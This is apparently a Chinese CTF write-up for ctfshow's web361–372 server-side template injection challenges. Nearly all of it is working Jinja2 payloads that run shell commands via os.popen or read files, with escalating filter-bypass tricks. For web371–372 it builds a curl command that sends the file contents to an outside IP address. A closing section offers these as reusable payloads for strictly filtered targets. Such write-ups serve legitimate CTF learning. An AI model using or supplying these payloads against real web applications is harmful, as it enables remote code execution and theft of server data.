ctfshow web入门 SSTI

web361

没做任何的过滤,任意payload即可
payload:

?name={
   
   {url_for.__globals__['os']['popen']("cat /flag").read()}

web362

提示做了过滤但上题的payload仍然能打通

web363

过滤了引号"
可以用request.args.a绕过
例：

{
   
   {()[request.args.a][request.args.b][-1][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__

就相当于执行了().__class__.__mro__.__subclasses__可以看出该方法不仅省略了" "，而且逗号也是可以用该方法的
payload:

?name={
   
   {url_for.__globals__[request.args.a][request.args.b](request.args.c).read()}}&a=os&b=popen&c=cat /flag

web364

过滤引号和args
可以用chr()函数绕过,但chr()默认是没有的需要自己去调用定义，chr()在builtins里
chr()定义方法

{% set chr=url_for.__globals__.__builtins__.chr %}

chr(111)%2bchr(115) // os %2b是'+'
chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(42) // cat /f*

payload:

?name={% set chr=url_for.__globals__.__builtins__.chr %}{
   
   {url_for.__globals__[chr(111)%2bchr(115)].popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(42)).read()}}

web365

过滤引号、args、中括号
可以用getitem()函数代替[]
例：

"".__class__.__mro__[2]
"".__class__.__mro__.__getitem__(2)//__getitem__(2)=[2]

所以只需要将 __globals__[chr(111)%2bchr(115)] 换成 __globals__.__getitem__(chr(111)%2bchr(115))
payload:

?name={% set chr=url_for.__globals__.__builtins__.chr %}{
   
   {url_for.__globals__.__getitem__(chr(111)%2bchr(115)).popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(42)).read()}}

web366

过滤引号、args、中括号、下划线
lipsum可以用os命令{ {lipsum.__globals__[‘os’].popen(‘ls’).read()}},再结合过滤器attr使用
payload:

?name={
   
   {(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}
cookie:a=__globals__;b=cat /flag

web367

过滤引号、args、中括号、下划线、os
只需要将上题的payload中的os也是用request方法即可
payload：

?name={
   
   {(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}
cookie:a=__globals__;b=os;c=cat /flag
过滤了args也可以用values,args代表GET传参,values代表POST传参但禁用POST时也可用GET方式
?name={
   
   {(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /flag

web368

过滤引号、args、中括号、下划线、os、花括号
可以用{%%}代替{ {}}
payload:

?name={%print((lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read())%}&a=__globals__&b=os&c=cat%20/flag

web369

过滤引号、args、中括号、下划线、os、花括号、request
过滤很死,所以要用set方法来构造我们需要的符号和方法
payload:

/?name=
{% set pop=dict(pop=a)|join%}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18) %}
{% set gb=(xiahuaxian,xiahuaxian,dict(glo=a,bals=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set get=dict(get=a)|join%}{% set o=dict(o=a,s=a)|join %}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set id=dict(index=a)|join%}
{% set bin=(xiahuaxian,xiahuaxian,dict(builtins=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set cr=dict(ch=a,r=a)|join%}
{% set chr=(lipsum|attr(gb))|attr(get)(bin)|attr(get)(cr) %}
{% set xiegang=chr(47)%}
{% set read=dict(read=a)|join%}
{% set space=chr(32) %}
{% set shell=(cat,space,xiegang,dict(flag=a)|join)|join %}

{% print(shell)%}
{%print(lipsum|attr(gb)|attr(get)(o)|attr(popen)(shell)|attr(read)())%}

羽师傅的绕过姿势

?name=
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
{%print(x.open(file).read())%}

web370

过滤引号、args、中括号、下划线、os、花括号、request、数字
可以用lipsum|string|list获取数字，或者使用count,lenth等函数计算字符长度来获取数字
例：

{% set ff=dict(f=a)|join%}
{% set one=(lipsum|string|list)|attr(id)(ff) %}
lenth
{% set c=dict(c=z)|join|length %}
count
{% set c=dict(c=z)|join|count %}

payload:

?name=
{% set nn=dict(n=a)|join%}
{% set tt=dict(t=a)|join%}
{% set ff=dict(f=a)|join%}
{% set dd=dict(index=a)|join%}
{% set id=dict(ind=a,ex=a)|join%}
{% set five=(lipsum|string|list)|attr(id)(tt) %}
{% set three=(lipsum|string|list)|attr(id)(nn) %}
{% set one=(lipsum|string|list)|attr(id)(ff) %}
{% set aa=three*five--one--one--one%}
{% set pop=dict(pop=a)|join%}{% set xiahuaxian=(lipsum|string|list)|attr(pop)(aa) %}{% set gb=(xiahuaxian,xiahuaxian,dict(glo=a,bals=a)|join,xiahuaxian,xiahuaxian)|join %}{% set get=dict(get=a)|join%}{% set o=dict(o=a,s=a)|join %}{% set popen=dict(popen=a)|join%}{% set ca=dict(ca=a,t=a)|join%}
{% set bin=(xiahuaxian,xiahuaxian,dict(built=a,ins=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set cr=dict(ch=a,r=a)|join%}
{% set chcr=(lipsum|attr(gb))|attr(get)(bin)|attr(get)(cr) %}
{% set xiegang=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}
{% set dh=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}
{% set rd=dict(re=a,ad=a)|join%}
{% set ls=dict(ls=a)|join%}
{% set space=chcr(three*three*five-five-five-three) %}
{% set shell=(ca,space,xiegang,dict(flag=a)|join)|join %}

{% print(shell)%}
{%print(lipsum|attr(gb)|attr(get)(o)|attr(popen)(shell)|attr(rd)())%}

羽师傅的绕过姿势:

?name=
{% set c=(dict(e=a)|join|count)%}
{% set cc=(dict(ee=a)|join|count)%}
{% set ccc=(dict(eee=a)|join|count)%}
{% set cccc=(dict(eeee=a)|join|count)%}
{% set ccccccc=(dict(eeeeeee=a)|join|count)%}
{% set cccccccc=(dict(eeeeeeee=a)|join|count)%}
{% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{% set coun=(cc~cccc)|int%}
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(coun)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}
{%print(x.open(file).read())%}

web371

过滤过滤引号、args、中括号、下划线、os、花括号、request、数字、print
print禁用了,只能用curl外带了

?name=
{% set c=dict(c=z)|join|length %}
{% set cc=dict(cc=z)|join|length %}
{% set ccc=dict(ccc=z)|join|length %}
{% set cccc=dict(cccc=z)|join|length %}
{% set ccccc=dict(ccccc=z)|join|length %}
{% set cccccc=dict(cccccc=z)|join|length %}
{% set ccccccc=dict(ccccccc=z)|join|length %}
{% set cccccccc=dict(cccccccc=z)|join|length %}
{% set ccccccccc=dict(ccccccccc=z)|join|length %}
{% set cccccccccc=dict(cccccccccc=z)|join|length %}
{% set space=(()|select|string|list).pop(ccccc*cc) %}
{% set xhx=(()|select|string|list).pop(ccc*cccccccc) %}
{% set point=(config|string|list).pop(cccccccccc*cc*cccccccccc-ccccccccc) %}
{% set maohao=(config|string|list).pop(cc*ccccccc) %}
{% set xiegang=(config|string|list).pop(-cccccccc*cccccccc) %}
{% set globals=(xhx,xhx,dict(globals=z)|join,xhx,xhx)|join %}
{% set builtins=(xhx,xhx,dict(builtins=z)|join,xhx,xhx)|join %}
{% set open=(lipsum|attr(globals)).get(builtins).open %}
{% set result=open((xiegang,dict(flag=z)|join)|join).read() %}
{% set curlcmd=(dict(curl=z)|join,space,dict(http=z)|join,maohao,xiegang,xiegang,cccc,ccccccccc,point,cc,ccc,cc,point,ccccccc,cccccc,point,c,cccc,maohao,cccc,c-c,c-c,c-c,xiegang,result)|join %} 
{% set ohs=dict(o=z,s=z)|join %}
{% set shell=(lipsum|attr(globals)).get(ohs).popen(curlcmd) %}

web372

过滤过滤引号、args、中括号、下划线、os、花括号、request、数字、print、count
上题payload就能打通,因为过滤的事count但没过滤lenth

常用payload

加两个常用payload,遇到过滤严格题目可以直接修改套用(狗头)

究极过滤payload:

{% set pop=dict(pop=a)|join%}{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18) %}{% set gb=(xiahuaxian,xiahuaxian,dict(glo=a,bals=a)|join,xiahuaxian,xiahuaxian)|join %}{% set get=dict(get=a)|join%}{% set os=dict(os=a)|join %}{% set popen=dict(popen=a)|join%}{% set ca=dict(ca=a,t=a)|join%}
{% set nn=dict(n=a)|join%}
{% set tt=dict(t=a)|join%}
{% set ff=dict(f=a)|join%}
{% set dd=dict(index=a)|join%}
{% set id=dict(ind=a,ex=a)|join%}
{% set five=(lipsum|string|list)|attr(id)(tt) %}
{% set three=(lipsum|string|list)|attr(id)(nn) %}
{% set one=(lipsum|string|list)|attr(id)(ff) %}
{% set bin=(xiahuaxian,xiahuaxian,dict(built=a,ins=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set cr=dict(ch=a,r=a)|join%}
{% set chcr=(lipsum|attr(gb))|attr(get)(bin)|attr(get)(cr) %}
{% set xiegang=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}
{% set dh=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}
{% set rd=dict(re=a,ad=a)|join%}
{% set ls=dict(ls=a)|join%}

{% set space=chcr(three*three*five-five-five-three) %}
{% set shell=(ca,space,dict(f1ag=a)|join,dh,dict(txt=a)|join)|join %}

{% print(shell)%}
{%print(lipsum|attr(gb)|attr(get)(os)|attr(popen)(shell)|attr(rd)())%}

外带payload:

?name=
{% set c=dict(c=z)|join|length %}
{% set cc=dict(cc=z)|join|length %}
{% set ccc=dict(ccc=z)|join|length %}
{% set cccc=dict(cccc=z)|join|length %}
{% set ccccc=dict(ccccc=z)|join|length %}
{% set cccccc=dict(cccccc=z)|join|length %}
{% set ccccccc=dict(ccccccc=z)|join|length %}
{% set cccccccc=dict(cccccccc=z)|join|length %}
{% set ccccccccc=dict(ccccccccc=z)|join|length %}
{% set cccccccccc=dict(cccccccccc=z)|join|length %}
{% set space=(()|select|string|list).pop(ccccc*cc) %}
{% set xhx=(()|select|string|list).pop(ccc*cccccccc) %}
{% set point=(config|string|list).pop(cccccccccc*cc*cccccccccc-ccccccccc) %}
{% set maohao=(config|string|list).pop(cc*ccccccc) %}
{% set xiegang=(config|string|list).pop(-cccccccc*cccccccc) %}
{% set globals=(xhx,xhx,dict(globals=z)|join,xhx,xhx)|join %}
{% set builtins=(xhx,xhx,dict(builtins=z)|join,xhx,xhx)|join %}
{% set open=(lipsum|attr(globals)).get(builtins).open %}
{% set result=open((xiegang,dict(flag=z)|join)|join).read() %}
{% set curlcmd=(dict(curl=z)|join,space,dict(http=z)|join,maohao,xiegang,xiegang,cccc,ccccccccc,point,cc,ccc,cc,point,ccccccc,cccccc,point,c,cccc,maohao,cccc,c-c,c-c,c-c,xiegang,result)|join %} 
{% set ohs=dict(o=z,s=z)|join %}
{% set shell=(lipsum|attr(globals)).get(ohs).popen(curlcmd) %}

还是SSTI有意思,哈哈哈哈哈哈哈哈哈嗝~撒花~